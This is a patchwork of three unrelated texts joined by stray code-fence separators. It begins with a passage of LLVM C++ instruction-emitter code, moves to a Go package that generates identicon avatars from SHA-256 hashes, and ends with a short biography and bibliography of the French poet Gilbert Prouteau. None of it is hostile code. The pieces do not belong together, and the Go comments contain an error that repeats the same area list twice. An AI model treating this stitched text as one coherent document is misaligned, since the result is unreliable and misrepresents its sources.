if (RC && RC != VRC)
RC = MRI->constrainRegClass(VReg, RC, MinRCSize);
// VReg has been adjusted. It can be used with SubIdx operands now.
if (RC)
return VReg;
// VReg couldn't be reasonably constrained. Emit a COPY to a new virtual
// register instead.
RC = TRI->getSubClassWithSubReg(TLI->getRegClassFor(VT, isDivergent), SubIdx);
assert(RC && "No legal register class for VT supports that SubIdx");
Register NewReg = MRI->createVirtualRegister(RC);
BuildMI(*MBB, InsertPos, DL, TII->get(TargetOpcode::COPY), NewReg)
.addReg(VReg);
return NewReg;
}
/// EmitSubregNode - Generate machine code for subreg nodes.
///
void InstrEmitter::EmitSubregNode(SDNode *Node,
DenseMap<SDValue, unsigned> &VRBaseMap,
bool IsClone, bool IsCloned) {
unsigned VRBase = 0;
unsigned Opc = Node->getMachineOpcode();
// If the node is only used by a CopyToReg and the dest reg is a vreg, use
// the CopyToReg'd destination register instead of creating a new vreg.
for (SDNode *User : Node->uses()) {
if (User->getOpcode() == ISD::CopyToReg &&
User->getOperand(2).getNode() == Node) {
unsigned DestReg = cast<RegisterSDNode>(User->getOperand(1))->getReg();
if (Register::isVirtualRegister(DestReg)) {
VRBase = DestReg;
break;
}
}
}
if (Opc == TargetOpcode::EXTRACT_SUBREG) {
// EXTRACT_SUBREG is lowered as %dst = COPY %src:sub. There are no
// constraints on the %dst register, COPY can target all legal register
// classes.
unsigned SubIdx = cast<ConstantSDNode>(Node->getOperand(1))->getZExtValue();
const TargetRegisterClass *TRC =
TLI->getRegClassFor(Node->getSimpleValueType(0), Node->isDivergent());
unsigned Reg;
MachineInstr *DefMI;
RegisterSDNode *R = dyn_cast<RegisterSDNode>(Node->getOperand(0));
if (R && Register::isPhysicalRegister(R->getReg())) {
Reg = R->getReg();
DefMI = nullptr;
} else {
Reg = R ? R->getReg() : getVR(Node->getOperand(0), VRBaseMap);
DefMI = MRI->getVRegDef(Reg);
}
unsigned SrcReg, DstReg, DefSubIdx;
if (DefMI &&
TII->isCoalescableExtInstr(*DefMI, SrcReg, DstReg, DefSubIdx) &&
SubIdx == DefSubIdx &&
TRC == MRI->getRegClass(SrcReg)) {
// Optimize these:
// r1025 = s/zext r1024, 4
// r1026 = extract_subreg r1025, 4
// to a copy
// r1026 = copy r1024
VRBase = MRI->createVirtualRegister(TRC);
BuildMI(*MBB, InsertPos, Node->getDebugLoc(),
TII->get(TargetOpcode::COPY), VRBase).addReg(SrcReg);
MRI->clearKillFlags(SrcReg);
} else {
// Reg may not support a SubIdx sub-register, and we may need to
// constrain its register class or issue a COPY to a compatible register
// class.
if (Register::isVirtualRegister(Reg))
Reg = ConstrainForSubReg(Reg, SubIdx,
Node->getOperand(0).getSimpleValueType(),
Node->isDivergent(), Node->getDebugLoc());
// Create the destreg if it is missing.
if (VRBase == 0)
VRBase = MRI->createVirtualRegister(TRC);
// Create the extract_subreg machine instruction.
MachineInstrBuilder CopyMI =
BuildMI(*MBB, InsertPos, Node->getDebugLoc(),
TII->get(TargetOpcode::COPY), VRBase);
if (Register::isVirtualRegister(Reg))
CopyMI.addReg(Reg, 0, SubIdx);
else
CopyMI.addReg(TRI->getSubReg(Reg, SubIdx));
}
} else if (Opc == TargetOpcode::INSERT_SUBREG ||
Opc == TargetOpcode::SUBREG_TO_REG) {
SDValue N0 = Node->getOperand(0);
SDValue N1 = Node->getOperand(1);
SDValue N2 = Node->getOperand(2);
unsigned SubIdx = cast<ConstantSDNode>(N2)->getZExtValue();
// Figure out the register class to create for the destreg. It should be
// the largest legal register class supporting SubIdx sub-registers.
// RegisterCoalescer will constrain it further if it decides to eliminate
// the INSERT_SUBREG instruction.
//
// %dst = INSERT_SUBREG %src, %sub, SubIdx
//
// is lowered by TwoAddressInstructionPass to:
//
// %dst = COPY %src
// %dst:SubIdx = COPY %sub
//
// There is no constraint on the %src register class.
//
const TargetRegisterClass *SRC =
TLI->getRegClassFor(Node->getSimpleValueType(0), Node->isDivergent());
SRC = TRI->getSubClassWithSubReg(SRC, SubIdx);
assert(SRC && "No register class supports VT and SubIdx for INSERT_SUBREG");
if (VRBase == 0 || !SRC->hasSubClassEq(MRI->getRegClass(VRBase)))
VRBase = MRI->createVirtualRegister(SRC);
// Create the insert_subreg or subreg_to_reg machine instruction.
MachineInstrBuilder MIB =
BuildMI(*MF, Node->getDebugLoc(), TII->get(Opc), VRBase);
// If creating a subreg_to_reg, then the first input operand
// is an implicit value immediate, otherwise it's a register
if (Opc == TargetOpcode::SUBREG_TO_REG) {
const ConstantSDNode *SD = cast<ConstantSDNode>(N0);
MIB.addImm(SD->getZExtValue());
} else
AddOperand(MIB, N0, 0, nullptr, VRBaseMap, /*IsDebug=*/false,
IsClone, IsCloned);
// Add the subregister being inserted
AddOperand(MIB, N1, 0, nullptr, VRBaseMap, /*IsDebug=*/false,
IsClone, IsCloned);
MIB.addImm(SubIdx);
MBB->insert(InsertPos, MIB);
} else
llvm_unreachable("Node is not insert_subreg, extract_subreg, or subreg_to_reg");
SDValue Op(Node, 0);
bool isNew = VRBaseMap.insert(std::make_pair(Op, VRBase)).second;
(void)isNew; // Silence compiler warning.
assert(isNew && "Node emitted out of order - early");
}
/// EmitCopyToRegClassNode - Generate machine code for COPY_TO_REGCLASS nodes.
/// COPY_TO_REGCLASS is just a normal copy, except that the destination
/// register is constrained to be in a particular register class.
///
void
InstrEmitter::EmitCopyToRegClassNode(SDNode *Node,
DenseMap<SDValue, unsigned> &VRBaseMap) {
unsigned VReg = getVR(Node->getOperand(0), VRBaseMap);
// Create the new VReg in the destination class and emit a copy.
unsigned DstRCIdx = cast<ConstantSDNode>(Node->getOperand(1))->getZExtValue();
const TargetRegisterClass *DstRC =
TRI->getAllocatableClass(TRI->getRegClass(DstRCIdx));
Register NewVReg = MRI->createVirtualRegister(DstRC);
BuildMI(*MBB, InsertPos, Node->getDebugLoc(), TII->get(TargetOpcode::COPY),
NewVReg).addReg(VReg);
SDValue Op(Node, 0);
bool isNew = VRBaseMap.insert(std::make_pair(Op, NewVReg)).second;
(void)isNew; // Silence compiler warning.
assert(isNew && "Node emitted out of order - early");
}
/// EmitRegSequence - Generate machine code for REG_SEQUENCE nodes.
///
void InstrEmitter::EmitRegSequence(SDNode *Node,
DenseMap<SDValue, unsigned> &VRBaseMap,
bool IsClone, bool IsCloned) {
unsigned DstRCIdx = cast<ConstantSDNode>(Node->getOperand(0))->getZExtValue();
const TargetRegisterClass *RC = TRI->getRegClass(DstRCIdx);
Register NewVReg = MRI->createVirtualRegister(TRI->getAllocatableClass(RC));
const MCInstrDesc &II = TII->get(TargetOpcode::REG_SEQUENCE);
MachineInstrBuilder MIB = BuildMI(*MF, Node->getDebugLoc(), II, NewVReg);
unsigned NumOps = Node->getNumOperands();
// If the input pattern has a chain, then the root of the corresponding
// output pattern will get a chain as well. This can happen to be a
// REG_SEQUENCE (which is not "guarded" by countOperands/CountResults).
if (NumOps && Node->getOperand(NumOps-1).getValueType() == MVT::Other)
--NumOps; // Ignore chain if it exists.
assert((NumOps & 1) == 1 &&
"REG_SEQUENCE must have an odd number of operands!");
for (unsigned i = 1; i != NumOps; ++i) {
SDValue Op = Node->getOperand(i);
if ((i & 1) == 0) {
RegisterSDNode *R = dyn_cast<RegisterSDNode>(Node->getOperand(i-1));
// Skip physical registers as they don't have a vreg to get and we'll
// insert copies for them in TwoAddressInstructionPass anyway.
if (!R || !Register::isPhysicalRegister(R->getReg())) {
unsigned SubIdx = cast<ConstantSDNode>(Op)->getZExtValue();
unsigned SubReg = getVR(Node->getOperand(i-1), VRBaseMap);
const TargetRegisterClass *TRC = MRI->getRegClass(SubReg);
const TargetRegisterClass *SRC =
TRI->getMatchingSuperRegClass(RC, TRC, SubIdx);
if (SRC && SRC != RC) {
MRI->setRegClass(NewVReg, SRC);
RC = SRC;
}
}
}
AddOperand(MIB, Op, i+1, &II, VRBaseMap, /*IsDebug=*/false,
IsClone, IsCloned);
}
MBB->insert(InsertPos, MIB);
SDValue Op(Node, 0);
bool isNew = VRBaseMap.insert(std::make_pair(Op, NewVReg)).second;
(void)isNew; // Silence compiler warning.
assert(isNew && "Node emitted out of order - early");
}
/// EmitDbgValue - Generate machine instruction for a dbg_value node.
///
MachineInstr *
InstrEmitter::EmitDbgValue(SDDbgValue *SD,
DenseMap<SDValue, unsigned> &VRBaseMap) {
MDNode *Var = SD->getVariable();
MDNode *Expr = SD->getExpression();
DebugLoc DL = SD->getDebugLoc();
assert(cast<DILocalVariable>(Var)->isValidLocationForIntrinsic(DL) &&
"Expected inlined-at fields to agree");
SD->setIsEmitted();
if (SD->isInvalidated()) {
// An invalidated SDNode must generate an undef DBG_VALUE: although the
// original value is no longer computed, earlier DBG_VALUEs live ranges
// must not leak into later code.
auto MIB = BuildMI(*MF, DL, TII->get(TargetOpcode::DBG_VALUE));
MIB.addReg(0U);
MIB.addReg(0U, RegState::Debug);
MIB.addMetadata(Var);
MIB.addMetadata(Expr);
return &*MIB;
}
if (SD->getKind() == SDDbgValue::FRAMEIX) {
// Stack address; this needs to be lowered in target-dependent fashion.
// EmitTargetCodeForFrameDebugValue is responsible for allocation.
auto FrameMI = BuildMI(*MF, DL, TII->get(TargetOpcode::DBG_VALUE))
.addFrameIndex(SD->getFrameIx());
if (SD->isIndirect())
// Push [fi + 0] onto the DIExpression stack.
FrameMI.addImm(0);
else
// Push fi onto the DIExpression stack.
FrameMI.addReg(0);
return FrameMI.addMetadata(Var).addMetadata(Expr);
}
// Otherwise, we're going to create an instruction here.
const MCInstrDesc &II = TII->get(TargetOpcode::DBG_VALUE);
MachineInstrBuilder MIB = BuildMI(*MF, DL, II);
if (SD->getKind() == SDDbgValue::SDNODE) {
SDNode *Node = SD->getSDNode();
SDValue Op = SDValue(Node, SD->getResNo());
// It's possible we replaced this SDNode with other(s) and therefore
// didn't generate code for it. It's better to catch these cases where
// they happen and transfer the debug info, but trying to guarantee that
// in all cases would be very fragile; this is a safeguard for any
// that were missed.
DenseMap<SDValue, unsigned>::iterator I = VRBaseMap.find(Op);
if (I==VRBaseMap.end())
MIB.addReg(0U); // undef
else
AddOperand(MIB, Op, (*MIB).getNumOperands(), &II, VRBaseMap,
/*IsDebug=*/true, /*IsClone=*/false, /*IsCloned=*/false);
} else if (SD->getKind() == SDDbgValue::VREG) {
MIB.addReg(SD->getVReg(), RegState::Debug);
} else if (SD->getKind() == SDDbgValue::CONST) {
const Value *V = SD->getConst();
if (const ConstantInt *CI = dyn_cast<ConstantInt>(V)) {
if (CI->getBitWidth() > 64)
MIB.addCImm(CI);
else
MIB.addImm(CI->getSExtValue());
} else if (const ConstantFP *CF = dyn_cast<ConstantFP>(V)) {
MIB.addFPImm(CF);
} else if (isa<ConstantPointerNull>(V)) {
// Note: This assumes that all nullptr constants are zero-valued.
MIB.addImm(0);
} else {
// Could be an Undef. In any case insert an Undef so we can see what we
// dropped.
MIB.addReg(0U);
}
} else {
// Insert an Undef so we can see what we dropped.
MIB.addReg(0U);
}
// Indirect addressing is indicated by an Imm as the second parameter.
if (SD->isIndirect())
MIB.addImm(0U);
else
MIB.addReg(0U, RegState::Debug);
MIB.addMetadata(Var);
MIB.addMetadata(Expr);
return &*MIB;
}
MachineInstr *
InstrEmitter::EmitDbgLabel(SDDbgLabel *SD) {
MDNode *Label = SD->getLabel();
DebugLoc DL = SD->getDebugLoc();
assert(cast<DILabel>(Label)->isValidLocationForIntrinsic(DL) &&
"Expected inlined-at fields to agree");
const MCInstrDesc &II = TII->get(TargetOpcode::DBG_LABEL);
MachineInstrBuilder MIB = BuildMI(*MF, DL, II);
MIB.addMetadata(Label);
return &*MIB;
}
/// EmitMachineNode - Generate machine code for a target-specific node and
/// needed dependencies.
///
void InstrEmitter::
EmitMachineNode(SDNode *Node, bool IsClone, bool IsCloned,
DenseMap<SDValue, unsigned> &VRBaseMap) {
unsigned Opc = Node->getMachineOpcode();
// Handle subreg insert/extract specially
if (Opc == TargetOpcode::EXTRACT_SUBREG ||
Opc == TargetOpcode::INSERT_SUBREG ||
Opc == TargetOpcode::SUBREG_TO_REG) {
EmitSubregNode(Node, VRBaseMap, IsClone, IsCloned);
return;
}
// Handle COPY_TO_REGCLASS specially.
if (Opc == TargetOpcode::COPY_TO_REGCLASS) {
EmitCopyToRegClassNode(Node, VRBaseMap);
return;
}
// Handle REG_SEQUENCE specially.
if (Opc == TargetOpcode::REG_SEQUENCE) {
EmitRegSequence(Node, VRBaseMap, IsClone, IsCloned);
return;
}
if (Opc == TargetOpcode::IMPLICIT_DEF)
// We want a unique VR for each IMPLICIT_DEF use.
return;
const MCInstrDesc &II = TII->get(Opc);
unsigned NumResults = CountResults(Node);
unsigned NumDefs = II.getNumDefs();
const MCPhysReg *ScratchRegs = nullptr;
// Handle STACKMAP and PATCHPOINT specially and then use the generic code.
if (Opc == TargetOpcode::STACKMAP || Opc == TargetOpcode::PATCHPOINT) {
// Stackmaps do not have arguments and do not preserve their calling
// convention. However, to simplify runtime support, they clobber the same
// scratch registers as AnyRegCC.
unsigned CC = CallingConv::AnyReg;
if (Opc == TargetOpcode::PATCHPOINT) {
CC = Node->getConstantOperandVal(PatchPointOpers::CCPos);
NumDefs = NumResults;
}
ScratchRegs = TLI->getScratchRegisters((CallingConv::ID) CC);
}
unsigned NumImpUses = 0;
unsigned NodeOperands =
countOperands(Node, II.getNumOperands() - NumDefs, NumImpUses);
bool HasPhysRegOuts = NumResults > NumDefs && II.getImplicitDefs()!=nullptr;
#ifndef NDEBUG
unsigned NumMIOperands = NodeOperands + NumResults;
if (II.isVariadic())
assert(NumMIOperands >= II.getNumOperands() &&
"Too few operands for a variadic node!");
else
assert(NumMIOperands >= II.getNumOperands() &&
NumMIOperands <= II.getNumOperands() + II.getNumImplicitDefs() +
NumImpUses &&
"#operands for dag node doesn't match .td file!");
#endif
// Create the new machine instruction.
MachineInstrBuilder MIB = BuildMI(*MF, Node->getDebugLoc(), II);
// Add result register values for things that are defined by this
// instruction.
if (NumResults) {
CreateVirtualRegisters(Node, MIB, II, IsClone, IsCloned, VRBaseMap);
// Transfer any IR flags from the SDNode to the MachineInstr
MachineInstr *MI = MIB.getInstr();
const SDNodeFlags Flags = Node->getFlags();
if (Flags.hasNoSignedZeros())
MI->setFlag(MachineInstr::MIFlag::FmNsz);
if (Flags.hasAllowReciprocal())
MI->setFlag(MachineInstr::MIFlag::FmArcp);
if (Flags.hasNoNaNs())
MI->setFlag(MachineInstr::MIFlag::FmNoNans);
if (Flags.hasNoInfs())
MI->setFlag(MachineInstr::MIFlag::FmNoInfs);
if (Flags.hasAllowContract())
MI->setFlag(MachineInstr::MIFlag::FmContract);
if (Flags.hasApproximateFuncs())
MI->setFlag(MachineInstr::MIFlag::FmAfn);
if (Flags.hasAllowReassociation())
MI->setFlag(MachineInstr::MIFlag::FmReassoc);
if (Flags.hasNoUnsignedWrap())
MI->setFlag(MachineInstr::MIFlag::NoUWrap);
if (Flags.hasNoSignedWrap())
MI->setFlag(MachineInstr::MIFlag::NoSWrap);
if (Flags.hasExact())
MI->setFlag(MachineInstr::MIFlag::IsExact);
if (Flags.hasNoFPExcept())
MI->setFlag(MachineInstr::MIFlag::NoFPExcept);
}
// Emit all of the actual operands of this instruction, adding them to the
// instruction as appropriate.
bool HasOptPRefs = NumDefs > NumResults;
assert((!HasOptPRefs || !HasPhysRegOuts) &&
"Unable to cope with optional defs and phys regs defs!");
unsigned NumSkip = HasOptPRefs ? NumDefs - NumResults : 0;
for (unsigned i = NumSkip; i != NodeOperands; ++i)
AddOperand(MIB, Node->getOperand(i), i-NumSkip+NumDefs, &II,
VRBaseMap, /*IsDebug=*/false, IsClone, IsCloned);
// Add scratch registers as implicit def and early clobber
if (ScratchRegs)
for (unsigned i = 0; ScratchRegs[i]; ++i)
MIB.addReg(ScratchRegs[i], RegState::ImplicitDefine |
RegState::EarlyClobber);
// Set the memory reference descriptions of this instruction now that it is
// part of the function.
MIB.setMemRefs(cast<MachineSDNode>(Node)->memoperands());
// Insert the instruction into position in the block. This needs to
// happen before any custom inserter hook is called so that the
// hook knows where in the block to insert the replacement code.
MBB->insert(InsertPos, MIB);
// The MachineInstr may also define physregs instead of virtregs. These
// physreg values can reach other instructions in different ways:
//
// 1. When there is a use of a Node value beyond the explicitly defined
// virtual registers, we emit a CopyFromReg for one of the implicitly
// defined physregs. This only happens when HasPhysRegOuts is true.
//
// 2. A CopyFromReg reading a physreg may be glued to this instruction.
//
// 3. A glued instruction may implicitly use a physreg.
//
// 4. A glued instruction may use a RegisterSDNode operand.
//
// Collect all the used physreg defs, and make sure that any unused physreg
// defs are marked as dead.
SmallVector<Register, 8> UsedRegs;
// Additional results must be physical register defs.
if (HasPhysRegOuts) {
for (unsigned i = NumDefs; i < NumResults; ++i) {
Register Reg = II.getImplicitDefs()[i - NumDefs];
if (!Node->hasAnyUseOfValue(i))
continue;
// This implicitly defined physreg has a use.
UsedRegs.push_back(Reg);
EmitCopyFromReg(Node, i, IsClone, IsCloned, Reg, VRBaseMap);
}
}
// Scan the glue chain for any used physregs.
if (Node->getValueType(Node->getNumValues()-1) == MVT::Glue) {
for (SDNode *F = Node->getGluedUser(); F; F = F->getGluedUser()) {
if (F->getOpcode() == ISD::CopyFromReg) {
UsedRegs.push_back(cast<RegisterSDNode>(F->getOperand(1))->getReg());
continue;
} else if (F->getOpcode() == ISD::CopyToReg) {
// Skip CopyToReg nodes that are internal to the glue chain.
continue;
}
// Collect declared implicit uses.
const MCInstrDesc &MCID = TII->get(F->getMachineOpcode());
UsedRegs.append(MCID.getImplicitUses(),
MCID.getImplicitUses() + MCID.getNumImplicitUses());
// In addition to declared implicit uses, we must also check for
// direct RegisterSDNode operands.
for (unsigned i = 0, e = F->getNumOperands(); i != e; ++i)
if (RegisterSDNode *R = dyn_cast<RegisterSDNode>(F->getOperand(i))) {
Register Reg = R->getReg();
if (Reg.isPhysical())
UsedRegs.push_back(Reg);
}
}
}
// Finally mark unused registers as dead.
if (!UsedRegs.empty() || II.getImplicitDefs() || II.hasOptionalDef())
MIB->setPhysRegsDeadExcept(UsedRegs, *TRI);
// Run post-isel target hook to adjust this instruction if needed.
if (II.hasPostISelHook())
TLI->AdjustInstrPostInstrSelection(*MIB, Node);
}
/// EmitSpecialNode - Generate machine code for a target-independent node and
/// needed dependencies.
void InstrEmitter::
EmitSpecialNode(SDNode *Node, bool IsClone, bool IsCloned,
DenseMap<SDValue, unsigned> &VRBaseMap) {
switch (Node->getOpcode()) {
default:
#ifndef NDEBUG
Node->dump();
#endif
llvm_unreachable("This target-independent node should have been selected!");
case ISD::EntryToken:
llvm_unreachable("EntryToken should have been excluded from the schedule!");
case ISD::MERGE_VALUES:
case ISD::TokenFactor: // fall thru
break;
case ISD::CopyToReg: {
unsigned DestReg = cast<RegisterSDNode>(Node->getOperand(1))->getReg();
SDValue SrcVal = Node->getOperand(2);
if (Register::isVirtualRegister(DestReg) && SrcVal.isMachineOpcode() &&
SrcVal.getMachineOpcode() == TargetOpcode::IMPLICIT_DEF) {
// Instead building a COPY to that vreg destination, build an
// IMPLICIT_DEF instruction instead.
BuildMI(*MBB, InsertPos, Node->getDebugLoc(),
TII->get(TargetOpcode::IMPLICIT_DEF), DestReg);
break;
}
unsigned SrcReg;
if (RegisterSDNode *R = dyn_cast<RegisterSDNode>(SrcVal))
SrcReg = R->getReg();
else
SrcReg = getVR(SrcVal, VRBaseMap);
if (SrcReg == DestReg) // Coalesced away the copy? Ignore.
break;
BuildMI(*MBB, InsertPos, Node->getDebugLoc(), TII->get(TargetOpcode::COPY),
DestReg).addReg(SrcReg);
break;
}
case ISD::CopyFromReg: {
unsigned SrcReg = cast<RegisterSDNode>(Node->getOperand(1))->getReg();
EmitCopyFromReg(Node, 0, IsClone, IsCloned, SrcReg, VRBaseMap);
break;
}
case ISD::EH_LABEL:
case ISD::ANNOTATION_LABEL: {
unsigned Opc = (Node->getOpcode() == ISD::EH_LABEL)
? TargetOpcode::EH_LABEL
: TargetOpcode::ANNOTATION_LABEL;
MCSymbol *S = cast<LabelSDNode>(Node)->getLabel();
BuildMI(*MBB, InsertPos, Node->getDebugLoc(),
TII->get(Opc)).addSym(S);
break;
}
case ISD::LIFETIME_START:
case ISD::LIFETIME_END: {
unsigned TarOp = (Node->getOpcode() == ISD::LIFETIME_START) ?
TargetOpcode::LIFETIME_START : TargetOpcode::LIFETIME_END;
FrameIndexSDNode *FI = dyn_cast<FrameIndexSDNode>(Node->getOperand(1));
BuildMI(*MBB, InsertPos, Node->getDebugLoc(), TII->get(TarOp))
.addFrameIndex(FI->getIndex());
break;
}
case ISD::INLINEASM:
case ISD::INLINEASM_BR: {
unsigned NumOps = Node->getNumOperands();
if (Node->getOperand(NumOps-1).getValueType() == MVT::Glue)
--NumOps; // Ignore the glue operand.
// Create the inline asm machine instruction.
unsigned TgtOpc = Node->getOpcode() == ISD::INLINEASM_BR
? TargetOpcode::INLINEASM_BR
: TargetOpcode::INLINEASM;
MachineInstrBuilder MIB =
BuildMI(*MF, Node->getDebugLoc(), TII->get(TgtOpc));
// Add the asm string as an external symbol operand.
SDValue AsmStrV = Node->getOperand(InlineAsm::Op_AsmString);
const char *AsmStr = cast<ExternalSymbolSDNode>(AsmStrV)->getSymbol();
MIB.addExternalSymbol(AsmStr);
// Add the HasSideEffect, isAlignStack, AsmDialect, MayLoad and MayStore
// bits.
int64_t ExtraInfo =
cast<ConstantSDNode>(Node->getOperand(InlineAsm::Op_ExtraInfo))->
getZExtValue();
MIB.addImm(ExtraInfo);
// Remember to operand index of the group flags.
SmallVector<unsigned, 8> GroupIdx;
// Remember registers that are part of early-clobber defs.
SmallVector<unsigned, 8> ECRegs;
// Add all of the operand registers to the instruction.
for (unsigned i = InlineAsm::Op_FirstOperand; i != NumOps;) {
unsigned Flags =
cast<ConstantSDNode>(Node->getOperand(i))->getZExtValue();
const unsigned NumVals = InlineAsm::getNumOperandRegisters(Flags);
GroupIdx.push_back(MIB->getNumOperands());
MIB.addImm(Flags);
++i; // Skip the ID value.
switch (InlineAsm::getKind(Flags)) {
default: llvm_unreachable("Bad flags!");
case InlineAsm::Kind_RegDef:
for (unsigned j = 0; j != NumVals; ++j, ++i) {
unsigned Reg = cast<RegisterSDNode>(Node->getOperand(i))->getReg();
// FIXME: Add dead flags for physical and virtual registers defined.
// For now, mark physical register defs as implicit to help fast
// regalloc. This makes inline asm look a lot like calls.
MIB.addReg(Reg,
RegState::Define |
getImplRegState(Register::isPhysicalRegister(Reg)));
}
break;
case InlineAsm::Kind_RegDefEarlyClobber:
case InlineAsm::Kind_Clobber:
for (unsigned j = 0; j != NumVals; ++j, ++i) {
unsigned Reg = cast<RegisterSDNode>(Node->getOperand(i))->getReg();
MIB.addReg(Reg,
RegState::Define | RegState::EarlyClobber |
getImplRegState(Register::isPhysicalRegister(Reg)));
ECRegs.push_back(Reg);
}
break;
case InlineAsm::Kind_RegUse: // Use of register.
case InlineAsm::Kind_Imm: // Immediate.
case InlineAsm::Kind_Mem: // Addressing mode.
// The addressing mode has been selected, just add all of the
// operands to the machine instruction.
for (unsigned j = 0; j != NumVals; ++j, ++i)
AddOperand(MIB, Node->getOperand(i), 0, nullptr, VRBaseMap,
/*IsDebug=*/false, IsClone, IsCloned);
// Manually set isTied bits.
if (InlineAsm::getKind(Flags) == InlineAsm::Kind_RegUse) {
unsigned DefGroup = 0;
if (InlineAsm::isUseOperandTiedToDef(Flags, DefGroup)) {
unsigned DefIdx = GroupIdx[DefGroup] + 1;
unsigned UseIdx = GroupIdx.back() + 1;
for (unsigned j = 0; j != NumVals; ++j)
MIB->tieOperands(DefIdx + j, UseIdx + j);
}
}
break;
}
}
// GCC inline assembly allows input operands to also be early-clobber
// output operands (so long as the operand is written only after it's
// used), but this does not match the semantics of our early-clobber flag.
// If an early-clobber operand register is also an input operand register,
// then remove the early-clobber flag.
for (unsigned Reg : ECRegs) {
if (MIB->readsRegister(Reg, TRI)) {
MachineOperand *MO =
MIB->findRegisterDefOperand(Reg, false, false, TRI);
assert(MO && "No def operand for clobbered register?");
MO->setIsEarlyClobber(false);
}
}
// Get the mdnode from the asm if it exists and add it to the instruction.
SDValue MDV = Node->getOperand(InlineAsm::Op_MDNode);
const MDNode *MD = cast<MDNodeSDNode>(MDV)->getMD();
if (MD)
MIB.addMetadata(MD);
MBB->insert(InsertPos, MIB);
break;
}
}
}
/// InstrEmitter - Construct an InstrEmitter and set it to start inserting
/// at the given position in the given block.
InstrEmitter::InstrEmitter(MachineBasicBlock *mbb,
MachineBasicBlock::iterator insertpos)
: MF(mbb->getParent()), MRI(&MF->getRegInfo()),
TII(MF->getSubtarget().getInstrInfo()),
TRI(MF->getSubtarget().getRegisterInfo()),
TLI(MF->getSubtarget().getTargetLowering()), MBB(mbb),
InsertPos(insertpos) {}
```
|
```go
// Generate pseudo-random avatars by IP, E-mail, etc.
package identicon
import (
"crypto/sha256"
"fmt"
"image"
"image/color"
)
const minImageSize = 16
// Identicon is used to generate pseudo-random avatars
type Identicon struct {
foreColors []color.Color
backColor color.Color
size int
rect image.Rectangle
}
// New returns an Identicon struct with the correct settings
// size image size
// back background color
// fore all possible foreground colors. only one foreground color will be picked randomly for one image
func New(size int, back color.Color, fore ...color.Color) (*Identicon, error) {
if len(fore) == 0 {
return nil, fmt.Errorf("foreground is not set")
}
if size < minImageSize {
return nil, fmt.Errorf("size %d is smaller than min size %d", size, minImageSize)
}
return &Identicon{
foreColors: fore,
backColor: back,
size: size,
rect: image.Rect(0, 0, size, size),
}, nil
}
// Make generates an avatar by data
func (i *Identicon) Make(data []byte) image.Image {
h := sha256.New()
h.Write(data)
sum := h.Sum(nil)
b1 := int(sum[0]+sum[1]+sum[2]) % len(blocks)
b2 := int(sum[3]+sum[4]+sum[5]) % len(blocks)
c := int(sum[6]+sum[7]+sum[8]) % len(centerBlocks)
b1Angle := int(sum[9]+sum[10]) % 4
b2Angle := int(sum[11]+sum[12]) % 4
foreColor := int(sum[11]+sum[12]+sum[15]) % len(i.foreColors)
return i.render(c, b1, b2, b1Angle, b2Angle, foreColor)
}
func (i *Identicon) render(c, b1, b2, b1Angle, b2Angle, foreColor int) image.Image {
p := image.NewPaletted(i.rect, []color.Color{i.backColor, i.foreColors[foreColor]})
drawBlocks(p, i.size, centerBlocks[c], blocks[b1], blocks[b2], b1Angle, b2Angle)
return p
}
/*
# Algorithm
Origin: An image is splitted into 9 areas
```
-------------
| 1 | 2 | 3 |
-------------
| 4 | 5 | 6 |
-------------
| 7 | 8 | 9 |
-------------
```
Area 1/3/9/7 use a 90-degree rotating pattern.
Area 1/3/9/7 use another 90-degree rotating pattern.
Area 5 uses a random pattern.
The Patched Fix: make the image left-right mirrored to get rid of something like "swastika"
*/
// draw blocks to the paletted
// c: the block drawer for the center block
// b1,b2: the block drawers for other blocks (around the center block)
// b1Angle,b2Angle: the angle for the rotation of b1/b2
func drawBlocks(p *image.Paletted, size int, c, b1, b2 blockFunc, b1Angle, b2Angle int) {
nextAngle := func(a int) int {
return (a + 1) % 4
}
padding := (size % 3) / 2 // in cased the size can not be aligned by 3 blocks.
blockSize := size / 3
twoBlockSize := 2 * blockSize
// center
c(p, blockSize+padding, blockSize+padding, blockSize, 0)
// left top (1)
b1(p, 0+padding, 0+padding, blockSize, b1Angle)
// center top (2)
b2(p, blockSize+padding, 0+padding, blockSize, b2Angle)
b1Angle = nextAngle(b1Angle)
b2Angle = nextAngle(b2Angle)
// right top (3)
// b1(p, twoBlockSize+padding, 0+padding, blockSize, b1Angle)
// right middle (6)
// b2(p, twoBlockSize+padding, blockSize+padding, blockSize, b2Angle)
b1Angle = nextAngle(b1Angle)
b2Angle = nextAngle(b2Angle)
// right bottom (9)
// b1(p, twoBlockSize+padding, twoBlockSize+padding, blockSize, b1Angle)
// center bottom (8)
b2(p, blockSize+padding, twoBlockSize+padding, blockSize, b2Angle)
b1Angle = nextAngle(b1Angle)
b2Angle = nextAngle(b2Angle)
// lef bottom (7)
b1(p, 0+padding, twoBlockSize+padding, blockSize, b1Angle)
// left middle (4)
b2(p, 0+padding, blockSize+padding, blockSize, b2Angle)
// then we make it left-right mirror, so we didn't draw 3/6/9 before
for x := 0; x < size/2; x++ {
for y := 0; y < size; y++ {
p.SetColorIndex(size-x, y, p.ColorIndexAt(x, y))
}
}
}
```
|
Gilbert Prouteau (14 June 1917 – 2 August 2012) was a French poet and film director. He was born in Nesmy, Vendée. In 1948 he won a bronze medal in the art competitions of the Olympic Games for his "Rythme du Stade" ("Rhythm of the Stadium"). At the beginning of the 1990s he was, with Jean-Pierre Thiollet, one of the writers contributing to the French magazine L'Amateur d'Art.
Selected works
Rythme du Stade, Lugdunum, 1942 (poems)
La part du vent, Ariane, 1947 (poems)
Anthologie des textes sportifs de la littérature, Défense de la France, 1948
Saison blanche, Amiot Dumont, 1951
Le Sexe des Anges, Grasset, 1952
La peur des femmes, Grasset, 1959
Immortelle Vendée, Les productions de Paris, 1959
Retour aux sources, Editions Hérault, 1960
Les Dieux meurent le matin, Grasset, 1962 (A collection relating the tragic deaths of ten poets).
Le machin, La Table Ronde, 1965
Tout est dans la fin, Robert Laffont, 1971
Comme un vol de corbeaux, La Table Ronde, 1977
Le Dernier Défi de Georges Clemenceau, France Empire, 1979
Le grand roman de Jules Verne: sa vie, Stock, 1979
Sept morts d'amour, Hachette, 1981
Les miroirs de la perversité, Albin Michel, 1984
La Nuit de l'île d'Aix ou le Crépuscule d'un dieu, Albin Michel, 1985
Gilles de Rais ou la Gueule du loup, Editions du Rocher, 1992
La bataille de Cholet ou la guerre en sabots, Editions du Rocher, 1993
Le fabuleux secret de l'alchimiste : Nicolas Flamel prophète ou imposteur, Bartillat, 1994
Je te dis qu’il faut vivre, Editions Hérault, 1998
